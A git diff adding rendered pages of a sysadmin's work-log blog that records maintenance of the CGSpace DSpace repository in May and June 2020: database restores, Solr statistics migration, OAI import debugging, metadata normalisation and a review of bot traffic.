+&#34;Bahta, Sirak T.&#34;,&#34;Sirak Bahta: 0000-0002-5728-2489&#34;
+$ ./add-orcid-identifiers-csv.py -i 2020-05-19-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
+</code></pre><ul>
+<li>An IITA user is having issues submitting to CGSpace and I see there are a rising number of PostgreSQL connections waiting in transaction and in lock:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/05/postgres_connections_cgspace-week2.png" alt="PostgreSQL connections"></p>
+<ul>
+<li>This is the same issue Tezira, Bizu, and CTA were having in the last few weeks and it I already downgraded the PostgreSQL JDBC driver version to the last version I was using before this started (42.2.10)
+<ul>
+<li>I will downgrade it to version 42.2.9 for now&hellip;</li>
+<li>The only other thing I can think of is that I upgraded Tomcat to 7.0.103 in March</li>
+</ul>
+</li>
+<li>Run system updates on DSpace Test (linode26) and reboot it</li>
+<li>Run system updates on CGSpace (linode18) and reboot it
+<ul>
+<li>After the system came back up I had to restart Tomcat 7 three times before all the Solr statistics cores came up OK</li>
+</ul>
+</li>
+<li>Send Atmire a snapshot of the CGSpace database for them to possibly troubleshoot the CUA issue with DSpace 6</li>
+</ul>
+<h2 id="2020-05-20">2020-05-20</h2>
+<ul>
+<li>Send CodeObia some logos and footer text for the next phase of OpenRXV development (<a href="https://github.com/ilri/OpenRXV/issues/18">#18</a>)</li>
+</ul>
+<h2 id="2020-05-25">2020-05-25</h2>
+<ul>
+<li>Add ORCID identifier for CIAT author Manuel Francisco
+<ul>
+<li>I added it to the controlled vocabulary and tagged the user&rsquo;s existing ~27 items in CGSpace using this CSV file with my <code>add-orcid-identifiers-csv.py</code> script:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-05-25-add-orcids.csv
+dc.contributor.author,cg.creator.id
+&#34;Díaz, Manuel F.&#34;,&#34;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&#34;
+&#34;Díaz, Manuel Francisco&#34;,&#34;Manuel Francisco Diaz Baca: 0000-0001-8996-5092&#34;
+$ ./add-orcid-identifiers-csv.py -i 2020-05-25-add-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -d
+</code></pre><ul>
+<li>Last week Maria asked again about searching for items by accession or issue date
+<ul>
+<li>A few months ago I had told her to search for the ISO8601 date in Discovery search, which appears to work because it filters the results down quite a bit</li>
+<li>She pointed out that the results include hits that don&rsquo;t exactly match, for example if part of the search string appears elsewhere like in the timestamp</li>
+<li>I checked in Solr and the results are the same, so perhaps it&rsquo;s a limitation in Solr&hellip;?</li>
+<li>So this effectively means that we don&rsquo;t have a way to create reports for items in an arbitrary date range shorter than a year:
+<ul>
+<li>DSpace advanced search is buggy or simply not designed to work like that</li>
+<li>AReS Explorer currently only allows filtering by year, but will allow months soon</li>
+<li>Atmire Listings and Reports only allows a &ldquo;Timespan&rdquo; of a year</li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-29">2020-05-29</h2>
+<ul>
+<li>Linode alerted to say that the CPU load on CGSpace (linode18) was high for a few hours this morning
+<ul>
+<li>Looking at the nginx logs for this morning with goaccess:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/*.log.1 | grep -E &#34;29/May/2020:(02|03|04|05)&#34; | goaccess --log-format=COMBINED -
+</code></pre><ul>
+<li>The top is 172.104.229.92, which is the AReS harvester (still not using a user agent, but it&rsquo;s tagged as a bot in the nginx mapping)</li>
+<li>Second is 188.134.31.88, which is a Russian host that we also saw in the last few weeks, using a browser user agent and hitting the XMLUI (but it is tagged as a bot in nginx as well)</li>
+<li>Another one is 51.158.106.4, which is some Scaleway IP making requests to XMLUI with different browser user agents that I am pretty sure I have seen before but never blocked
+<ul>
+<li>According to Solr it has made about 800 requests this year, but still&hellip; it&rsquo;s a bot.</li>
+</ul>
+</li>
+<li>One I don&rsquo;t think I&rsquo;ve seen before is 95.217.58.146, which is making requests to XMLUI with a Drupal user agent
+<ul>
+<li>According to <a href="https://viewdns.info/reverseip/?host=95.217.58.146&amp;t=1">viewdns.info</a> it belongs to <a href="https://landvoc.org/">landvoc.org</a></li>
+<li>I should add Drupal to the list of bots&hellip;</li>
+</ul>
+</li>
+<li>Atmire got back to me about the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">Solr CUA issue in the DSpace 6 upgrade</a> and they cannot reproduce the error
+<ul>
+<li>The next step is for me to migrate DSpace Test (linode26) to DSpace 6 and try to reproduce the error there</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-05-31">2020-05-31</h2>
+<ul>
+<li>Start preparing to migrate DSpace Test (linode26) to the <code>6_x-dev-atmire-modules</code> branch
+<ul>
+<li>Run all system updates and reboot</li>
+<li>For now I will disable all yearly Solr statistics cores except the current <code>statistics</code> one</li>
+<li>Prepare PostgreSQL with a clean snapshot of CGSpace&rsquo;s DSpace 5.8 database:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ sudo su - postgres
+$ dropdb dspacetest
+$ createdb -O dspacetest --encoding=UNICODE dspacetest
+$ psql dspacetest -c &#39;alter user dspacetest superuser;&#39;
+$ pg_restore -d dspacetest -O --role=dspacetest /tmp/cgspace_2020-05-31.backup
+$ psql dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
+# run DSpace 5 version of update-sequences.sql!!!
+$ psql -f /home/dspace/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
+$ psql dspacetest -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
+$ psql dspacetest -c &#39;CREATE EXTENSION pgcrypto;&#39;
+$ exit
+</code></pre><ul>
+<li>Now switch to the DSpace 6.x branch and start a build:</li>
+</ul>
+<pre tabindex="0"><code>$ chrt -i 0 ionice -c2 -n7 nice -n19 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false package
+...
+[ERROR] Failed to execute goal on project additions: Could not resolve dependencies for project org.dspace.modules:additions:jar:6.3: Failed to collect dependencies at com.atmire:atmire-listings-and-reports-api:jar:6.x-2.10.8-0-SNAPSHOT: Failed to read artifact descriptor for com.atmire:atmire-listings-and-reports-api:jar:6.x-2.10.8-0-SNAPSHOT: Could not transfer artifact com.atmire:atmire-listings-and-reports-api:pom:6.x-2.10.8-0-SNAPSHOT from/to atmire.com-snapshots (https://atmire.com/artifactory/atmire.com-snapshots): Not authorized , ReasonPhrase:Unauthorized. -&gt; [Help 1]
+</code></pre><ul>
+<li>Great! I will have to send Atmire a note about this&hellip; but for now I can sync over my local <code>~/.m2</code> directory and the build completes</li>
+<li>After the Maven build completed successfully I installed the updated code with Ant (make sure to delete the old spring directory):</li>
+</ul>
+<pre tabindex="0"><code>$ cd dspace/target/dspace-installer
+$ rm -rf /blah/dspacetest/config/spring
+$ ant update
+</code></pre><ul>
+<li>Database migrations take 10:18.287s during the first startup&hellip;
+<ul>
+<li>perhaps when we do the production CGSpace migration I can do this in advance and tell users not to make any submissions?</li>
+</ul>
+</li>
+<li>I had a mistake in my Solr internal URL parameter so DSpace couldn&rsquo;t find it, but once I fixed that DSpace starts up OK!</li>
+<li>Once the initial Discovery reindexing was completed (after three hours or so!) I started the Solr statistics UUID migration:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
+$ dspace solr-upgrade-statistics-6x -i statistics -n 250000
+$ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
+$ dspace solr-upgrade-statistics-6x -i statistics -n 1000000
+...
+</code></pre><ul>
+<li>It&rsquo;s taking about 35 minutes for 1,000,000 records&hellip;</li>
+<li>Some issues towards the end of this core:</li>
+</ul>
+<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><ul>
+<li>So basically there are some documents that have IDs that have <em>not</em> been converted to UUID, and have <em>not</em> been labeled as &ldquo;unmigrated&rdquo; either&hellip;
+<ul>
+<li>Of these 101,257 documents, 90,000 are of type 5 (search), 9,000 are type storage, and 800 are type view, but it&rsquo;s weird because if I look at their type/statistics_type using a facet the storage ones disappear&hellip;</li>
+<li>For now I will export these documents from the statistics core and then delete them:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./run.sh -s http://localhost:8081/solr/statistics -a export -o statistics-unmigrated.json -k uid -f &#39;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&#39;
+$ curl -s &#34;http://localhost:8081/solr/statistics/update?softCommit=true&#34; -H &#34;Content-Type: text/xml&#34; --data-binary &#34;&lt;delete&gt;&lt;query&gt;(*:* NOT id:/.{36}/) AND (*:* NOT id:/.+-unmigrated/)&lt;/query&gt;&lt;/delete&gt;&#34;
+</code></pre><ul>
+<li>Now the UUID conversion script says there is nothing left to convert, so I can try to run the Atmire CUA conversion utility:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;
+$ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 1
+</code></pre><ul>
+<li>The processing is very slow and there are lots of errors like this:</li>
+</ul>
+<pre tabindex="0"><code>Record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221 couldn&#39;t be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: 7b5b3900-28e8-417f-9c1c-e7d88a753221, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(AtomicStatisticsUpdater.java:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(AtomicStatisticsUpdater.java:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(AtomicStatisticsUpdater.java:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(AtomicStatisticsUpdater.java:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(AtomicStatisticsUpdateCLI.java:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.NullPointerException
+</code></pre><ul>
+<li>Experiment a bit with the Python <a href="https://pypi.org/project/country-converter/">country-converter</a> library as it can convert between different formats (like ISO 3166 and UN m49)
+<ul>
+<li>We need to eventually find a format we can use for all CGIAR DSpaces&hellip;</li>
+</ul>
+</li>
+</ul>
+<!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-06/index.html b/docs/2020-06/index.html
new file mode 100644
index 000000000..6f942d5b6
--- /dev/null
+++ b/docs/2020-06/index.html
@@ -0,0 +1,865 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="June, 2020" />
+<meta property="og:description" content="2020-06-01
+
+I tried to run the AtomicStatisticsUpdateCLI CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+
+I sent Atmire the dspace.log from today and told them to log into the server to debug the process
+
+
+In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working
+I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-06/" />
+<meta property="article:published_time" content="2020-06-01T13:55:39+03:00" />
+<meta property="article:modified_time" content="2020-07-08T16:30:40+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="June, 2020"/>
+<meta name="twitter:description" content="2020-06-01
+
+I tried to run the AtomicStatisticsUpdateCLI CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+
+I sent Atmire the dspace.log from today and told them to log into the server to debug the process
+
+
+In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working
+I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "June, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-06/",
+  "wordCount": "4788",
+  "datePublished": "2020-06-01T13:55:39+03:00",
+  "dateModified": "2020-07-08T16:30:40+03:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-06/">
+
+    <title>June, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-06/">June, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-06-01T13:55:39+03:00">Mon Jun 01, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-06-01">2020-06-01</h2>
+<ul>
+<li>I tried to run the <code>AtomicStatisticsUpdateCLI</code> CUA migration script on DSpace Test (linode26) again and it is still going very slowly and has tons of errors like I noticed yesterday
+<ul>
+<li>I sent Atmire the dspace.log from today and told them to log into the server to debug the process</li>
+</ul>
+</li>
+<li>In other news, I checked the statistics API on DSpace 6 and it&rsquo;s working</li>
+<li>I tried to build the OAI registry on the freshly migrated DSpace 6 on DSpace Test and I get an error:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace oai import -c
+OAI 2.0 manager action started
+Loading @mire database changes for module MQM
+Changes have been processed
+Clearing index
+Index cleared
+Using full import.
+Full import
+java.lang.NullPointerException
+        at org.dspace.xoai.app.XOAI.willChangeStatus(XOAI.java:438)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:368)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:280)
+        at org.dspace.xoai.app.XOAI.indexAll(XOAI.java:227)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:134)
+        at org.dspace.xoai.app.XOAI.main(XOAI.java:560)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><h2 id="2020-06-02">2020-06-02</h2>
+<ul>
+<li>I noticed that I was able to do a partial OAI import (ie, without <code>-c</code>)
+<ul>
+<li>Then I tried to clear the OAI Solr core and import, but I get the same error:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl http://localhost:8080/solr/oai/update -H &#34;Content-type: text/xml&#34; --data-binary &#39;&lt;delete&gt;&lt;query&gt;*:*&lt;/query&gt;&lt;/delete&gt;&#39;
+$ curl http://localhost:8080/solr/oai/update -H &#34;Content-type: text/xml&#34; --data-binary &#39;&lt;commit /&gt;&#39;
+$ ~/dspace63/bin/dspace oai import
+OAI 2.0 manager action started
+...
+There are no indexed documents, using full import.
+Full import
+java.lang.NullPointerException
+        at org.dspace.xoai.app.XOAI.willChangeStatus(XOAI.java:438)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:368)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:280)
+        at org.dspace.xoai.app.XOAI.indexAll(XOAI.java:227)
+        at org.dspace.xoai.app.XOAI.index(XOAI.java:143)
+        at org.dspace.xoai.app.XOAI.main(XOAI.java:560)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><ul>
+<li>I found a <a href="https://jira.lyrasis.org/browse/DS-4363">bug report on DSpace Jira</a> describing this issue affecting someone else running DSpace 6.3
+<ul>
+<li>They suspect it has to do with the item having some missing group names in its authorization policies</li>
+<li>I added some debugging to <code>dspace-oai/src/main/java/org/dspace/xoai/app/XOAI.java</code> to print the Handle of the item that causes the crash and then I looked at its authorization policies</li>
+<li>Indeed there are some blank group names:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/item-authorizations-dspace63.png" alt="Missing group names in DSpace 6.3 item authorization policy"></p>
+<ul>
+<li>The same item on CGSpace (DSpace 5.8) also has groups with no name:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/item-authorizations-dspace58.png" alt="Missing group names in DSpace 5.8 item authorization policy"></p>
+<ul>
+<li>I added some debugging and found exactly where this happens
+<ul>
+<li>As it turns out we can just check if the group policy is null there and it allows the OAI import to proceed</li>
+<li>Aaaaand as it turns out, this was fixed in <code>dspace-6_x</code> in 2018 after DSpace 6.3 was released (see <a href="https://jira.lyrasis.org/browse/DS-4019">DS-4019</a>), so that was a waste of three hours.</li>
+<li>I cherry picked 150e83558103ed7f50e8f323b6407b9cbdf33717 into our current <code>6_x-dev-atmire-modules</code> branch</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-04">2020-06-04</h2>
+<ul>
+<li>Maria was asking about some items they are trying to map from the CGIAR Big Data collection into their Alliance of Bioversity and CIAT journal articles collection, but for some reason the items don&rsquo;t show up in the item mapper
+<ul>
+<li>The items don&rsquo;t even show up in the XMLUI Discover advanced search, and actually I don&rsquo;t even see any recent items on the recently submitted part of the collection (but the item pages exist of course)</li>
+<li>Perhaps I need to try a full Discovery re-index:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    125m37.423s
+user    11m20.312s
+sys     3m19.965s
+</code></pre><ul>
+<li>Still I don&rsquo;t see the item in XMLUI search or in the item mapper (and I made sure to clear the Cocoon cache)
+<ul>
+<li>I&rsquo;m starting to think it&rsquo;s something related to the database transaction issue&hellip;</li>
+<li>I removed our custom JDBC driver from <code>/usr/local/apache-tomcat...</code> so that DSpace will use its own much older one, version 9.1-901-1.jdbc4</li>
+<li>I ran all system updates on the server (linode18) and rebooted it</li>
+<li>After it came back up I had to restart Tomcat five times before all Solr statistics cores came up properly</li>
+<li>Unfortunately this means that the Tomcat JDBC pooling via JNDI doesn&rsquo;t work, so we&rsquo;re using only the 30 connections reserved for the DSpace CLI from DSpace&rsquo;s own internal pool</li>
+<li>Perhaps our previous issues with the database pool from a few years ago will be less now that we have much more aggressive blocking and rate limiting of bots in nginx</li>
+</ul>
+</li>
+<li>I will also import a fresh database snapshot from CGSpace and check if I can map the item in my local environment
+<ul>
+<li>After importing and forcing a full reindex locally I can see the item in search and in the item mapper</li>
+</ul>
+</li>
+<li>Abenet sent another message about two users who are having issues with submission, and I see the number of locks in PostgreSQL has sky rocketed again as of a few days ago:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
+<ul>
+<li>As far as I can tell this started happening for the first time in April, connections and locks:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/postgres_connections_ALL-year.png" alt="PostgreSQL connections year">
+<img src="/cgspace-notes/2020/06/postgres_locks_ALL-year.png" alt="PostgreSQL locks year"></p>
+<ul>
+<li>I think I need to just leave this as is with the DSpace default JDBC driver for now, but perhaps I could also downgrade the Tomcat version (I deployed Tomcat 7.0.103 in March, so perhaps that&rsquo;s relevant)</li>
+<li>Also, I&rsquo;ll start <em>another</em> full reindexing to see if the issue with mapping is somehow also resolved now that the database connections are working better
+<ul>
+<li>Perhaps related, but this one finished much faster:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -i 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    101m41.195s
+user    10m9.569s
+sys     3m13.929s
+</code></pre><ul>
+<li>Unfortunately the item is still not showing up in the item mapper&hellip;</li>
+<li>Something happened to AReS Explorer (linode20) so I ran all system updates and rebooted it</li>
+</ul>
+<h2 id="2020-06-07">2020-06-07</h2>
+<ul>
+<li>Peter said he was annoyed with a CSV export from CGSpace because of the different <code>text_lang</code> attributes and asked if we can fix it</li>
+<li>The last time I normalized these was in 2019-06, and currently it looks like this:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang ORDER BY count DESC;
+  text_lang  |  count
+-------------+---------
+ en_US       | 2158377
+ en          |  149540
+             |   49206
+ es_ES       |      18
+ fr          |       4
+ Peer Review |       1
+             |       0
+(7 rows)
+</code></pre><ul>
+<li>In theory we can have different languages for metadata fields but in practice we don&rsquo;t do that, so we might as well normalize everything to &ldquo;en_US&rdquo; (and perhaps I should make a curation task to do this)</li>
+<li>For now I will do it manually on CGSpace and DSpace Test:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2;
+UPDATE 2414738
+</code></pre><ul>
+<li>Note: DSpace Test doesn&rsquo;t have the <code>resource_type_id</code> column because it&rsquo;s running DSpace 6 and <a href="https://wiki.lyrasis.org/display/DSPACE/DSpace+Service+based+api">the schema changed to use an object model there</a>
+<ul>
+<li>We need to use this on DSpace 6:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item);
+</code></pre><ul>
+<li>Peter asked if it was possible to find all ILRI items that have &ldquo;zoonoses&rdquo; or &ldquo;zoonotic&rdquo; in their titles and check if they have the ILRI subject &ldquo;ZOONOTIC DISEASES&rdquo; (and add it if not)
+<ul>
+<li>Unfortunately the only way we have currently would be to export the entire ILRI community as a CSV and filter/edit it in OpenRefine</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-08">2020-06-08</h2>
+<ul>
+<li>I manually mapped the two Big Data items that Maria had asked about last week by exporting their metadata to CSV and re-importing it
+<ul>
+<li>I still need to look into the underlying issue there, seems to be something in Solr</li>
+<li>Something strang is that, when I search for part of the title in Discovery I get 2,000 results on CGSpace, while on my local DSpace 5.8 environment I get 2!</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/cgspace-discovery-search.png" alt="CGSpace Discovery search results"></p>
+<p><img src="/cgspace-notes/2020/06/localhost-discovery-search.png" alt="CGSpace Discovery search results"></p>
+<ul>
+<li>On DSpace Test, which is currently running DSpace 6, I get 2,000 results but the top one is the correct match and the item does show up in the item mapper
+<ul>
+<li>Interestingly, if I search directly in the Solr <code>search</code> core on CGSpace with a query like <code>handle:10568/108315</code> I don&rsquo;t see the item, but on my local Solr I see them!</li>
+</ul>
+</li>
+<li>Peter asked if it was easy for me to add ILRI subject &ldquo;ZOONOTIC DISEASES&rdquo; to any items in the ILRI community that had &ldquo;zoonotic&rdquo; or &ldquo;zoonoses&rdquo; in their title, but were missing the ILRI subject
+<ul>
+<li>I exported the ILRI community metadata, cut the three fields I needed, and then filtered and edited the CSV in OpenRefine:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace metadata-export -i 10568/1 -f /tmp/2020-06-08-ILRI.csv
+$ csvcut -c &#39;id,cg.subject.ilri[en_US],dc.title[en_US]&#39; ~/Downloads/2020-06-08-ILRI.csv &gt; /tmp/ilri.csv
+</code></pre><ul>
+<li>Moayad asked why he&rsquo;s getting HTTP 500 errors on CGSpace
+<ul>
+<li>I looked in the Nginx logs and I see some HTTP 500 responses, but nothing in nginx&rsquo;s error.log</li>
+<li>Looking in Tomcat&rsquo;s log I see there are many:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># journalctl --since=today -u tomcat7  | grep -c &#39;Internal Server Error&#39;
+482
+</code></pre><ul>
+<li>They are all related to the REST API, like:</li>
+</ul>
+<pre tabindex="0"><code>Jun 07 02:00:27 linode18 tomcat7[6286]: SEVERE: Mapped exception to response: 500 (Internal Server Error)
+Jun 07 02:00:27 linode18 tomcat7[6286]: javax.ws.rs.WebApplicationException
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at org.dspace.rest.Resource.processException(Resource.java:151)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at org.dspace.rest.ItemsResource.getItems(ItemsResource.java:195)
